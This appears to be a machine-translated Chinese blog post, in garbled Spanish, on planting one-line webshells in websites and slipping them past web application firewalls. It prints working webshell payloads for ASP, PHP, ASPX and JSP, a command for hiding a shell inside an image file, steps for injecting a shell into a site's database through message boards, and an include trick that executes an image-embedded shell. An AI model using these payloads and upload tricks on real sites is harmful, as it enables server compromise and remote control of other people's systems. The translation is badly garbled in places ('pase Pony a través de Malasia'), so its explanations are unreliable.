Subir vulnerabilidad de un simple uso de Troya (incluyendo WAF)

frase de Troya

asp:<%eval request("heroes")%>

php:<?php @eval($_POST[12345]);?>

aspx:<%@ Page Language="Jscript"%><%eval(Request.Item["12345"],"unsafe");%>

jsp:<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%> //保存为1.jsp,提交url为 http://localhost/1.jsp?f=1.txt&;t=hello,访问http://localhost/1.txt 出来hello

  • Método de producción:
    1.C32 escritura directa
    del 2.cmd copy /b 1.jpg+1.asp 2.jpg
    los derechos de propiedad Derecho de inserción (no oculto en lo alto)

Proceso (por ejemplo aquí por ASP)

1. Busque el formato de base de datos es el sitio asp, y luego a través de las juntas o los artículos sobre mensajes para añadir una palabra a la base de datos ASP troyano o añadir la página
2. Nuestro objetivo es ponerlo en la base de datos, no importa qué forma
3. Abrir el Cliente terminar (es decir, el archivo htm en su ordenador), relleno se unió a la página asp asp frase o archivo, a continuación, introduzca el servidor

Troyanos siguen extendiéndose la palabra mediante el uso de la herramienta de caballo

Utilice la herramienta para subir de Troya

pase Pony a través de Malasia

Subir Malasia

Malasia es este efecto

Malasia

Uso encriptada WAF

1. Vaya a la Internet para encontrar el archivo cifrado añadir una palabra sobre el secreto
2. El perro tenía un principio de palabra: el uso de funciones vuelto a montar en una palabra de Troya por variables perturbadoras, sin pasar por WAF
Los perros tenían una palabra

Que contiene más de WAF

  • Varios tipos de código que pueden contener comprobar en línea
    aquí para subir dos archivos, y bao.asp 1.jpg (Troya)
    bao.asp: <! - # include file = el "1.jpg" -?>
  • Debido 1.jpg es un formato de imagen, por lo que el código no se ejecuta, para llevar a cabo bao.asp y bao.asp su vez 1.jpg (es decir, Troya) como la ejecución asp
Publicado 13 artículos originales · ganado elogios 0 · Vistas 441

Supongo que te gusta

Origin blog.csdn.net/m0_46230316/article/details/105294572
Recomendado
Clasificación